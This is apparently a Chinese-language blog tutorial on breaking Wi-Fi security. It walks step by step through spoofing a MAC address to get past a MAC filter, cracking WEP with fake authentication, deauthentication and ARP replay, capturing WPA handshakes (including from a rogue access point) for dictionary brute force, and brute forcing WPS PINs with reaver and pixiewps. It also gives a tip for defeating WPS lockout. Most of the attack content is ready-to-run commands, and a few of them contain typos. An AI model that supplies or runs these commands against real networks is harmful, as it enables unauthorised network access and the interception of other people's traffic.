無線攻擊及密碼破解的四種方式詳解

隨着社會的進步，現在我們在每一地方逗留都離不開無線通信，WiFi、4G等等；這就是無線領域的優勢所在！

無線領域十分難以捉摸，從一點兒一點兒進步到現在，無線的安全深入人心，站在安全的角度來說無線通信一旦被截獲或者竊取那麼將造成無法估量的損失。

下面詳細介紹無線WiFi領域的四種加密方式的攻擊手段。

主要利用工具：Kali(aircrack-ng、wifite、pixiewps等)。

 

MAC地址綁定攻擊

管理員誤以爲MAC綁定是一種安全機制，能夠限制可以關聯的客戶端MAC地址。
準備AP：
1、AP基本配置
2、Open認證
3、開啓無線過濾
修改MAC地址繞過過濾：
//一：別人做了白名單mac綁定，這樣的話，偵聽這個BSSID，查看哪一個STA的MAC已經連上，複製這個已經連上的STA的MAC，把這個MAC地址複製到自己的無線網卡的MAC上。

//ifconfig wlan0 down
//macchanger -m 接MAC地址 接網卡
//ifconfig wlan0 up

再去連接，就可以連接上了。——>雙方存在的話會丟包，信號不好（除非只有一個存在）

WEP攻擊

WEP共享密鑰破解
WEP密碼破解原理：
1、IV並非完全隨機
2、每224個包可能出現一次IV重用
3、收集大量IV之後找出相同IV及其對應密文，分析得出共享密碼
ARP回包中包含IV
只要在IV足夠多的情況下，任何複雜程度的WEP密碼都可以被破解
（IV量破解和暴力破解）

流程：
啓動monitor模式
啓動抓包並保存抓包
Deauthentication抓取XOR文件
利用XOR文件與AP建立關聯
執行ARP重放
Deauthentication觸發ARP數據包
收集足夠DATA之後破解密碼
//利用抓到的keystream加密一個change發給AP，AP用這個keystream解密，確認解開，就可以建立關聯。（keystream在.xor結尾的文件裏(密文的)）先建立關聯才能進行數據包的發收、攻擊等。
—————————————————————————————————————————
有新用戶連接上時

原理：
例：
64位密鑰=5(ASCII)*8(bit)+24iv=64
128位密鑰=13(ASCII)*8(bit)+24iv=128
128位密鑰=16(十六進制)*4(bit)*2(字符)=128
偵聽這個AP的BSSID：

airdump-ng -c X --bssid XXX -w xxx wlan0mon

利用XOR文件與AP建立關聯

aireplay-ng -1 60 -e kifi -y keystream.xor -a AP的BSSID -h 自己的MAC地址

//-1是authentication注入包的攻擊方式，60s發一次，目標ESSID，抓取的密鑰流，ESSID這個AP的BSSID的MAC，本機的無線MAC地址
//keystream是密鑰流=XOR=change+cifer
//keystream有新用戶連接上時才抓取到change從而計算出keystream。——>效率低

—————————————————————————————————————————
已經連接的情況

Deauthentication抓取XOR文件
aireplay-ng -0 10 -a AP的BSSID -c 已經關聯的STA的MAC wlan0mon
//10次攻擊，打擊後PWR的值是0
//Deauthentication是-0注入包的攻擊方式（用於打掉已關聯的關聯AP與STA），基於自動重連，我們就可以抓到數據包
從而得到keystream

—————————————————————————————————————————
通過上面兩個得到keystream後，執行下面的：
執行ARP重放
//64位的密鑰建議抓到20W以上的IV值，128位是150W以上的IV值。看情況，理論上IV值多越快。
//#Data裏面代表IV值數據多少。
aireplay-ng -3 -b AP的MAC -h 本機無線MAC wlan0mon
ARP——>將IP地址轉換爲MAC地址。二層通信就是這樣。
原理：通過本機電腦向AP發送ARP，接收AP響應的大量IV值。
思路：通過讓已經連接的合法的STA向AP發送合法的ARP，然後中途截取後轉到本機電腦，再由本機重放合法的ARP發給AP
//aireplay-ng -0 2 -a AP的BSSID -c 已經關聯的STA的MAC wlan0mon
//打掉連接，產生ARP————>上面命令未得到ARP的話。

收集足夠DATA之後破解密碼
//可以一邊抓一邊破解
aircrack-ng XXX.cap————————>只要IV值足夠，直接破解了。
//不用密碼字典
—————————————————————————————————————————
FAKE AUTHENTICATION
WEP破解全部需要首先僞造認證，以便與AP進行正常通信
不產生ARP數據包

aireplay-ng -1 0 -e kifi -a <AP MAC> -h <YOUR MAC> <interface>
aireplay-ng -1 60 -o 1 -q 10 -e <ESSID> -a <AP MAC> -h <Your MAC> <interface>

    每6000秒發送reauthentication
    -o 1 每次身份認證只發一組認證數據包
    -q 10 每10秒發keep-live幀

FAKE AUTHENTICATION排錯
某些AP驗證客戶端MAC地址OUI（前三個字節）——>虛假客戶端MAC
MAC地址過濾
Denied（Code 1）is WPA in use
    WPA/WPA2不支持Fake authentication
使用真實MAC地址
物理靠近AP————>離信號太遠
偵聽信道正確
—————————————————————————————————————————
DEAUTHENTICATION攻擊
強制客戶端與AP斷開關聯
    重連生成ARP請求，AP回包包含IV
    WPA重連過程，過程抓取4步握手過程
    無客戶端情況下此攻擊無效

aireplay-ng -0 0 -a kifi -c <Client MAC> <interface name>

    0就是無限發包，直至打掉
    不指定-c參數時，以廣播攻擊所有客戶端
    每攻擊發送128個包，64個給AP，64個給客戶端    
    物理足夠接近被攻擊者

DEAUTHENTICATION排錯
物理足夠接近被攻擊者
與被攻擊者使用相同無限標準b、n、g
客戶端可能拒絕廣播幀，建議指定客戶端
—————————————————————————————————————————
ARP重放
偵聽正常的ARP包並重放給AP
AP回包中包含大量弱IV——>重複出現

aireplay-ng -3 -b <AP MAC> -h <Source MAC> <interface name>

    -h 合法客戶端/ 攻擊者MAC
aireplay-ng data 字段
    64bit密鑰：25W
    128bit密鑰：150W
—————————————————————————————————————————
WEP破解
 

aireplay-ng wep.cap

—————————————————————————————————————————
關聯不一定代表能夠聯網、無法數據傳輸。

WEP有兩種方式：
1、有新用戶連接時抓取到keystream，進行關聯，抓IV，aircrack-ng xx.cap破解。
2、都是已經連接狀態：打掉連接，通過抓取ARP，重放攻擊到AP上，產生足夠IV值，aircrack-ng xx.cap破解。
#####沒有連接，是竊取不了的。

WPA攻擊

WPA PSK攻擊只有一種密碼破解方法：——>暴力破解
(WPA不存在WEP的弱點，只能暴力破解)

暴力破解條件：
1、CPU資源
2、時間
3、字典質量：
      1、網上共享的字典
       2、泄露密碼
       3、地區電話號碼段
       4、Crunch生成字典
       5、kali中自帶的字典 ——>有些密碼不符合要求，會自動過濾
//理論上WPA2比WPA1相對安全
//我不覺得，肯定有其他方式破解

PSK破解過程：
    啓動monitor
    開始抓包並保存
    Deauthentication攻擊獲取4步握手信息     //打掉連接，待它重連的時期獲取4步握手信息
    使用字典暴力破解

airodump-ng wlan0mon --bassid MAC -c 11 -w wpa
aireplay-ng -0 2 -a BSSID的MAC -c STA的MAC wlan0mon

完成後會顯示：WPA handshake——>四步握手信息
——>CH 11 ][ Elapsed: 7 mins ][ 2018-12-20 06:58 ][ WPA handshake: FA:62:14:E2:8D:
ls WPA*   就能看到保存下來的信息

aircrack-ng -w xxx WPA-01.cap

（-w是指定密碼字典，kali自帶的字典（其他軟件的字典）有：/usr/share/john/password.lst、/usr/share/wfuzz/wordlist、/usr/share/wordlists/rockyou.txt.gz（使用：gunzip rockyou.txt.gz解壓））
//查看多少行：cat password.txt | wc -l
//查看：grep XXX rockyou.txt

—————————————————————————————————————————
只有客戶端，無AP情況下的WPA密碼破解(距離客戶端近，距離AP太遠)
原理：客戶端會發probe包，詢問哪個是連接過得WiFi，泄露信息。
僞造AP，抓客戶端MAC和他發送probe包要連接的AP，僞造一個這樣的AP名進行四步握手。
    啓動monitor    
    開始抓包並保存
    關鍵——>根據probe信息僞造相同ESSID的AP
    抓取四步握手中的前兩個 包——>重要信息（Nonce1、Nonce2、MAC1、MAC2）
    使用字典暴力破解
//其實四步握手的前兩步基本上就得到了重要信息（Nonce1、Nonce2、MAC1、MAC2），可以計算出PTK
PMK：(ESSID+Presharekey)進行4096的hash計算後生成的PMK。
——>
//僞造AP：airbase-ng --essid 對應的AP名 -c 11 wlan0mon
創造、僞造AP：

airbase-ng --essid AP名  -c 11 wlan0mon ————>OPEN方式
airbase-ng --essid AP名  -c 11 -z 2 wlan0mon————>WPA2、TKIP
airbase-ng --essid AP名  -c 11 -Z 4 wlan0mon————>WPA、CCMP

//破解：aircrack-ng -w 密碼字典 WPA.cap
—————————————————————————————————————————
兩種方式：
1、打掉已連接，抓取信息。
2、當STA需要主動連接已經連接過的WiFi時，僞造AP，獲取握手信息。

 

WPS攻擊

WPS（WIRELESS PROTECTED SETUP）
WPS是WiFi聯盟2006年開發的一項技術
    通過PIN碼來簡化無線接入的操作，無需記住PSK
    路由器和網卡各按一個按鈕就能接入無線
    PIN碼是分爲前後各4位的2段共8位數字
安全漏洞
    2011年被發現安全涉及漏洞
    接入發起方可以根據路由器的返回信息判斷前4位是否正確
    而PIN碼的後4位只有1000種定義的組合（最後一位是checksum）
    所以全部窮舉破解只需要11000次嘗試
        PSK：218340105584896種可能
    標準本身沒有設計鎖定機制，目前多個廠商已實現鎖定機制
//都要支持WPS功能，初衷是：物理連接，物理確認（通過按鈕  ）。
//AP要是支持WPS的話，只要嘗試最多11000次找出PIN碼，就會被破解。
——>因爲有限制，所以設置攻擊方式、次數等
用計算器直接算出PIN
    C83A35、00B00C——>很少見

//它直接找出PIN碼，最多11000次；找出後計算出key，肯定能算出，不像WPA要字典。
——————————————————————————————————————————
啓動偵聽後，發現支持WPS的AP
    

    wash -C -i wlan0mon 
    airodump-ng wlan0mon --wps 

爆破PIN碼 

    reaver -i wlan0mon -b <AP mac> -vv 

 秒破PIN碼

    reaver -i wlan0mon -b <AP mac> -vv -K 1 

    pixiewps  
    只適用於固定廠商的芯片，成功率很低

reaver -i wlan0mon -b <AP mac> -vv -p 88888888

問題：
    很多廠家實現了鎖定機制，所以爆破時應注意限速
    一旦觸發鎖定，可嘗試耗盡AP連接數，令其重啓並解除WPS鎖定

綜合自動化無線密碼破解工具：（命令：wifite）
//可自動偵聽、掃描、攻擊。
——>先pixiewps攻擊、再常規攻擊、再打掉抓過程攻擊。
——————————————————————————————————————————
實操：
用reaver：
先stop service、再kill、再映射網卡。

wash -i wlan0mon
reaver -i wlan0mon -b <BSSID MAC> -c <信道> -vv -K 1             ——>-K 1 看是否有漏洞的pin
（no pin）——>reaver -i wlan0mon -b <BSSID MAC> -c <信道> -vv  ——>all test

//一直嘗試到正確的pin碼，通過PIN碼發送命令，查出密碼。——>爲防止鎖定，嘗試也有安全機制。
——>等待！！！
用pixiewps：——>工作方式：利用reaver抓包截獲下來的這些個密文和隨機數組合命令
//破解的效率提升。

pixiewps -e <pke> -r <pkr> -s <e-hash1> -z <e-hash2> -a <authkey> -n <e-nonce>

//pke、pkr、e-hash1等都是reaver中完整的一次過程產生的值。
###
//當pixie破解出PIN碼，回到reaver中輸入：reaver -i wlan0mon -b <BSSID MAC> -vv -p <wps PIN>
只要PIN碼正確，就能直接查出密碼。
###
用wifite：

wifite -h

 

————————————————————————————————————————————————————————

#有什麼問題請評論進行解答，需要學習的可以留下郵箱給你發送學習資料。